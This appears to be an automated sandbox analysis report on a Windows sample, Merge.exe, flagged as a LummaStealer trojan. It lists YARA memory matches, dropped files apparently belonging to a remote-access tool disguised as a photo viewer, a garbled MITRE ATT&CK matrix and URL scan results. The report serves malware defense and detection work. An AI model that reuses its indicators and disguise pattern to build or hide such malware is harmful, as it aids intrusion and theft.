                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a773a49.94.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a75d8e8.56.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a742b50.62.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a6bd2f8.75.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a75d8e8.56.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a642758.30.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.7a4d588.41.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.DisplayPhotoViewer.exe.7e20000.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.b0e0cd9.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a6bd309.70.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a642758.63.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.ab11758.14.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a6cc91f.90.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a777788.77.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.DisplayPhotoViewer.exe.a642758.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.ae0a125.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a6e5f86.91.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a6a128e.37.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a6ab58e.18.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.DisplayPhotoViewer.exe.a5e2950.6.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a691f27.20.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.adf3f56.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a742b61.102.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.b2993f1.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.adda8ef.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a642758.104.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a773a38.61.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.DisplayPhotoViewer.exe.a4a1c78.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a642758.39.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a642758.30.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a687c27.38.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a6cc91f.90.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a6a128e.37.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.c2fed98.89.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a642758.63.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a6cc91f.107.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a75d8e8.93.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a6d392f.67.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.7b069b0.13.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a6d392f.67.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a6ecf96.68.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a53bf78.9.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.7b069b0.13.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.DisplayPhotoViewer.exe.a53bf78.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a6e5f86.91.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a777788.77.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a777788.92.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.DisplayPhotoViewer.exe.a53bf78.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.add58ef.17.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.b2f7769.27.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a75d8e8.99.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.DisplayPhotoViewer.exe.111abb38.11.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.c2fed98.89.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a6bd2f8.75.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a642758.69.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.b28a9c2.6.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a52b218.12.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.DisplayPhotoViewer.exe.a5e2950.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a642758.39.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a677c1f.19.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a687c27.38.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a642758.69.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.DisplayPhotoViewer.exe.66460000.12.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a777f30.55.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a677c1f.19.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a6bd2f8.54.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a642758.104.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a6ecf96.68.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a53bf78.9.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.DisplayPhotoViewer.exe.6f910000.20.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a7d66f9.74.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.DisplayPhotoViewer.exe.10700000.9.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a6ab58e.18.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a8266e0.60.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a6bd2f8.106.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a526c88.10.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a742b61.95.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.DisplayPhotoViewer.exe.a4a1c78.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a777f30.55.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.b2993f1.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a8266e0.65.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a691f27.20.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a8266e0.60.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a777788.97.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a7c7990.59.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.ae0a125.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.adf3f56.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.af365a1.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.adda8ef.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.af365a1.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.af32b80.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.DisplayPhotoViewer.exe.11000000.10.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2951937785.000000000A642000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3122142214.000000000A63B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3110032044.0000000005866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2627011351.0000000007AED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3122142214.000000000A624000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2951725255.000000000A777000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3122142214.000000000A5BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3125781981.000000000B230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2944097023.000000000A6BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2944484464.000000000A642000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2940933364.000000000A757000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3124698930.000000000A720000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2951937785.000000000A660000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2950813744.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2941656091.000000000A73C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2951391104.000000000A773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2939650660.000000000A728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2950075179.000000000C2A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2643241230.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3120515904.000000000A532000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2944931640.000000000A6BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3116856613.0000000007E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2951583851.000000000A71A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2935540782.000000000A642000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3149738972.00000000664A0000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3122142214.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2616773901.0000000007AEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2943414129.000000000A6BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3120515904.000000000A4A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: DisplayPhotoViewer.exe PID: 7172, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\remcmdstub.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\audiocapture.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcichek.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\htctl32.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\tcctl32.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicl32.dll, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity InformationAcquire Infrastructure2
                                Valid Accounts                                		3
                                Native API                                		1
                                DLL Side-Loading                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		41
                                Input Capture                                		2
                                System Time Discovery                                		Remote Services11
                                Archive Collected Data                                		3
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomains1
                                Replication Through Removable Media                                		2
                                Service Execution                                		1
                                DLL Search Order Hijacking                                		1
                                DLL Search Order Hijacking                                		3
                                Obfuscated Files or Information                                		LSASS Memory11
                                Peripheral Device Discovery                                		Remote Desktop Protocol1
                                Screen Capture                                		12
                                Encrypted Channel                                		Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain AccountsAt2
                                Valid Accounts                                		2
                                Valid Accounts                                		12
                                Software Packing                                		Security Account Manager1
                                Account Discovery                                		SMB/Windows Admin Shares41
                                Input Capture                                		4
                                Non-Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCron1
                                Windows Service                                		21
                                Access Token Manipulation                                		1
                                DLL Side-Loading                                		NTDS4
                                File and Directory Discovery                                		Distributed Component Object Model3
                                Clipboard Data                                		5
                                Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                                Windows Service                                		1
                                DLL Search Order Hijacking                                		LSA Secrets24
                                System Information Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                                Process Injection                                		1
                                Masquerading                                		Cached Domain Credentials131
                                Security Software Discovery                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                                Valid Accounts                                		DCSync1
                                Process Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                                Access Token Manipulation                                		Proc Filesystem11
                                Application Window Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                                Process Injection                                		/etc/passwd and /etc/shadow1
                                System Owner/User Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                Merge.exe20%VirustotalBrowse
                                Merge.exe16%ReversingLabsWin32.Trojan.LummaStealer

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe0%ReversingLabs
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\FilesystemDialogs.dll3%ReversingLabs
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\FreeImage.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\JEncrypt.dll8%ReversingLabs
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\MediaInfo.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\RwcTouch.dll4%ReversingLabs
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\audiocapture.dll3%ReversingLabs
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\bass.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\htctl32.dll3%ReversingLabs
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\msvcr100.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicapi.dll3%ReversingLabs
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcichek.dll3%ReversingLabs
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicl32.dll3%ReversingLabs
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\remcmdstub.exe3%ReversingLabs
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\tcctl32.dll3%ReversingLabs
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\zxing.dll13%ReversingLabs

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                http://www.divx.com;;;YUV;4:2:00%Avira URL Cloudsafe
                                http://www.fourcc.org/indexyuv.htm;;;YUV;0%Avira URL Cloudsafe
                                http://www.r-wipe.comListBox0%Avira URL Cloudsafe
                                http://ffdshow-tryout.sourceforge.net/;;;0%Avira URL Cloudsafe
                                http://www.winnov.com/0%Avira URL Cloudsafe
                                http://www.isky.co.kr/html/cs/download.jsp0%Avira URL Cloudsafe
                                http://mirror01.iptelecom.net.ua/~video/codecs/PICVideo.MJPG.v2.10.27.codec.exe0%Avira URL Cloudsafe
                                http://mirror01.iptelecom.net.ua/~video/codecs/miroVIDEO-XL.codec.v2.2.exe0%Avira URL Cloudsafe
                                http://mirror01.iptelecom.net.ua/~video/codecs/LEAD.MCMP-JPEG.v1.016.codec.exe0%Avira URL Cloudsafe
                                http://base.fims.tv0%Avira URL Cloudsafe
                                http://www.smpte-ra.org/schemas/2067-2/2016/PKL0%Avira URL Cloudsafe
                                http://www.speex.org/0%Avira URL Cloudsafe
                                http://mirror01.iptelecom.net.ua/~video/codecs/Autodesk.Animator.v1.11.Codec.exe;;;0%Avira URL Cloudsafe
                                http://www.iis.fraunhofer.de/amm/index.html;0%Avira URL Cloudsafe
                                http://mediaxw.sourceforge.net;;;YUV0%Avira URL Cloudsafe
                                http://www.free-codecs.com/download/Alparysoft_Lossless_Video_Codec.htm;;;0%Avira URL Cloudsafe
                                http://www.pbcore.org/PBCore/PBCoreXSD_Ver_1-2-1.xsdhttp://www.pbcore.org/PBCore/PBCoreNamespace.htm0%Avira URL Cloudsafe
                                http://world.casio.com/;Casio0%Avira URL Cloudsafe
                                http://www.lucasarts.com/0%Avira URL Cloudsafe
                                https://www.3delite.hu/Secondary%20Display%20Photo%20Viewer/Privacy%20policy.txtopenU0%Avira URL Cloudsafe
                                http://www.smpte-ra.org/schemas/2067-2/2013http://www.smpte-ra.org/schemas/2067-2/XXXXhttp://www.smp0%Avira URL Cloudsafe
                                https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/DownloadSecondaryDisplayPhotoViewer.h0%Avira URL Cloudsafe
                                http://eMajix.com0%Avira URL Cloudsafe
                                http://www.real.com;;;0%Avira URL Cloudsafe
                                http://www.streambox.com/products/act-L2_codec.htm0%Avira URL Cloudsafe
                                http://mirror01.iptelecom.net.ua/~video/codecs/Avid.VfW.codec.v2.0d2.exe;;;YUV0%Avira URL Cloudsafe
                                http://eMajix.com;;;0%Avira URL Cloudsafe
                                http://www.vorbis.com;;Mode0%Avira URL Cloudsafe
                                http://www.real.com;LC0%Avira URL Cloudsafe
                                http://description.fims.tv0%Avira URL Cloudsafe
                                http://www.cinepak.com/text.html;;;0%Avira URL Cloudsafe
                                http://freeimage.sourceforge.net0%Avira URL Cloudsafe
                                http://www.fourcc.org/indexyuv.htm;;;YUV;4:1:10%Avira URL Cloudsafe
                                http://www.smpte.org/;;;YUV0%Avira URL Cloudsafe
                                http://www.theora.com0%Avira URL Cloudsafe
                                http://www.digicine.com/PROTO-ASDCP-AM-20040311#0%Avira URL Cloudsafe
                                http://www.on2.com/vp7.php3;;;0%Avira URL Cloudsafe
                                http://www.vorbis.com/;Lossy0%Avira URL Cloudsafe
                                http://mysif.ru/SIF1_dd_Eng.htm;;;0%Avira URL Cloudsafe
                                http://dividix.host.sk0%Avira URL Cloudsafe
                                http://ffdshow.sourceforge.net/tikiwiki/tiki-index.php?page=Getting0%Avira URL Cloudsafe
                                http://www.musepack.net;Lossy0%Avira URL Cloudsafe
                                https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/filesystemdialogs.htmlopenU0%Avira URL Cloudsafe
                                http://www.adobe.fr/products/encore/;Lossless0%Avira URL Cloudsafe
                                http://ffdshow-tryout.sourceforge.net/;;;YUV;4:2:00%Avira URL Cloudsafe
                                http://www.winnov.com/;;;0%Avira URL Cloudsafe
                                http://geo.netsupportsoftware.comlocation/loca.asp0%Avira URL Cloudsafe
                                http://www.smpte-ra.org/schemas/2067-2/20130%Avira URL Cloudsafe
                                http://www.iis.fraunhofer.de/amm/index.html;;Version0%Avira URL Cloudsafe
                                https://secure.r-tt.com/UserConsole.shtmlopen0%Avira URL Cloudsafe
                                http://www.array.com0%Avira URL Cloudsafe
                                http://winace.com0%Avira URL Cloudsafe
                                http://mirror01.iptelecom.net.ua/~video/codecs/CUseeMe.JPEG.CODEC.v1.17.exe0%Avira URL Cloudsafe
                                http://www.real.com;;;;;;Lossless0%Avira URL Cloudsafe
                                http://www.nerodigital.com0%Avira URL Cloudsafe
                                http://mirror01.iptelecom.net.ua/~video/codecs/PICVideo.Lossless.JPEG.codec.v2.10.27.exe;;;YUV0%Avira URL Cloudsafe
                                http://pbcore.org/xsd/pbcore-2.0.xsdhttp://www.pbcore.org/PBCore/PBCoreNamespace.html0%Avira URL Cloudsafe
                                http://www.digitalvoodoo.net/;;;0%Avira URL Cloudsafe
                                https://www.r-wipe.com/#win-touchhttps://secure.r-tt.com/cgi-bin/Store?P=513mailto:sales0%Avira URL Cloudsafe
                                http://www.q-team.de;;;0%Avira URL Cloudsafe
                                http://mediaxw.sourceforge.net0%Avira URL Cloudsafe
                                https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/filesystemdialogs.html0%Avira URL Cloudsafe
                                http://www.playon.tv/playlater0%Avira URL Cloudsafe
                                http://www.cineform.com/products/ConnectHD.htm0%Avira URL Cloudsafe
